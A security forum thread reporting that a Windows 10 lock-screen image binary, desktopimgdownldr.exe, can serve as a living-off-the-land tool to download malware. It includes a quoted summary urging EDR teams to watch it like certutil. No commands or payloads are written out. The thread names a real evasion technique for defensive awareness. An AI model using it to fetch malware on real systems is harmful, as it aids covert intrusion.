Windows 10 background image tool can be abused to download malware

CyberTech

Level 32
Verified
Nov 10, 2017
2,120
A binary in Windows 10 responsible for setting an image for the desktop and lock screen can help attackers download malware on a compromised system without raising the alarm.
Known as living-of-the-land binaries (LoLBins), these files come with the operating system and have a legitimate purpose. Attackers of all colors are abusing them in post-exploitation phases to hide malicious activity.

The new LoL in the Bin
An attacker can use LoLBins to download and install malware, bypass security controls such as UAC or WDAC. Typically, the attack involves fileless malware and reputable cloud services.

 

silversurfer

Level 68
Verified
Trusted
Content Creator
Malware Hunter
Aug 17, 2014
5,778
Executive Summary
  • Security professionals care about uncovering LOLBins; we found a new one that can be used to download arbitrary files as an alternative to certutil.
  • It can be run by standard users on most versions of Window 10 used in the enterprise.
  • EDR practitioners should update their queries and watchlists to treat desktopimgdownldr.exe (new LOLBin binary) like certutil.exe.
 

jogs

Level 21
Verified
Nov 19, 2012
1,064
Is there anything in Windows that can't be abused!
I think every program can be abused, no matter how much a program is updated and patched there will always be a way to hack it.
Its also true for hardware, whatever protection the vendor makes there will always be someone who will be able to crack that protection.
 
Top